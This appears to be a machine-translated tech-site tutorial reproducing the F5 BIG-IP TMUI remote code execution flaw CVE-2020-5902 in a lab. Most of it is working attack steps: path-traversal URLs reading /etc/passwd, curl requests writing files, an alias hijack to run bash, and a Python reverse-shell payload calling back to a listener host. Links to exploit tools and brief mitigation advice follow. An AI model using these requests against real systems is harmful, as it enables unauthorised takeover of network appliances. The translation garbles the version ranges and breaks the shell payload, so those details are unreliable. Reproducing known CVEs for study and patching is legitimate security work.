Shulou(Shulou.com)05/31 Report--

This article introduces how to achieve F5 BIG-IP remote code execution vulnerability CVE-2020-5902 reproduction, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Introduction to 0x00

F5 BIG-IP is an application delivery platform that integrates traffic management, DNS, inbound and outbound rules, web application firewall, web gateway, load balancing and other functions. A remote code execution vulnerability exists in the traffic management user page (TMUI) / configuration program specific page of the F5 BIG-IP product, resulting in unauthorized access to all functions of the TMUI module, including undisclosed functions, including the execution of arbitrary system commands, arbitrary file reads, arbitrary file writes, enabling / disabling services, and so on.

Overview of 0x02 vulnerabilities

An attacker can exploit this vulnerability to execute arbitrary system commands, create or delete files, disable services, execute arbitrary Java code, and gain full control of the target system by shell.

0x03 scope of influence

F5 BIG-IP 15.1.0

F5 BIG-IP 15.0.0

F5 BIG-IP 14.1.0 Mel 14.1.2

F5 BIG-IP 13.1.0 color 13.1.3

F5 BIG-IP 12.1.0 color 12.1.5

F5 BIG-IP 11.6.1 Mui 11.6.5

0x04 environment building

1. Register on F5 official website and log in to download the trial.

Https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition

two。 Then choose any download area and download it.

3. After the download is complete, use VMware to import the installation

VMware upper left corner 'File'-> 'Open' Select the downloaded file

4. In terms of configuration, you can start the system by default account after import: you need to change the default password after root/default login.

5. Enter config, configure the ip address, and click enter twice.

6. After setting up IP, visit the link and the login page will be installed successfully / / Note to add https and IP

Https://172.16.1.186/tmui/login.jsp

Recurrence of 0x05 vulnerabilities

1. Since the login management page is where the vulnerability exists, we use poc to read the test file:

Https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

two。 Write to a file

Curl-k-H "Content-Type: application/x-www-form-urlencoded"-X POST-d "fileName=/tmp/success&content= East Tower Network Security Institute"https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp""

3. Read a file

Curl-k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success"

4. Change alias hijack list command to bash

Curl-k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"

4.1Writing files: bash files

Https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id

4.2 execute the bash file

Https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test

Note: this operation cannot be completed because of insufficient permissions, so you can try it in the real world.

5. Bounce shell, write python bounce shell

Https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/shell&content=python-c "import os,socket,subprocess;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM); s.connect (('172.16.1.132))

Os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p=subprocess.call (['/ bin/bash','-i']); "

Use kali to monitor

Execute the following command to rebound shell / / No permission. There is no successful bounce here. You can test it in the real environment.

6. Use tools

Https://github.com/theLSA/f5-bigip-rce-cve-2020-5902

Https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902

0x06 repair recommendation

1. It is officially suggested that the impact can be temporarily mitigated through the following steps (temporary repair scheme)

1.1 Log in to the corresponding system using the following command: tmsh

1.2 Editing the configuration file of the httpd component

Edit / sys httpd all-properties

1.3The contents of the file are as follows: include 'Redirect 404 /'

1.4 Save the file as follows

Press ESC and enter: wq

1.5 execute command to refresh configuration file

Save / sys config

Restart the httpd service.

Restart sys service httpd also forbids external IP from accessing TMUI pages.

2. Upgrade to the following version

BIG-IP 15.x: 15.1.0.4

BIG-IP 14.x: 14.1.2.6

BIG-IP 13.x: 13.1.3.4

BIG-IP 12.x: 12.1.5.2

BIG-IP 11.x: 11.6.5.2

On how to achieve F5 BIG-IP remote code execution vulnerability CVE-2020-5902 reproduction is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.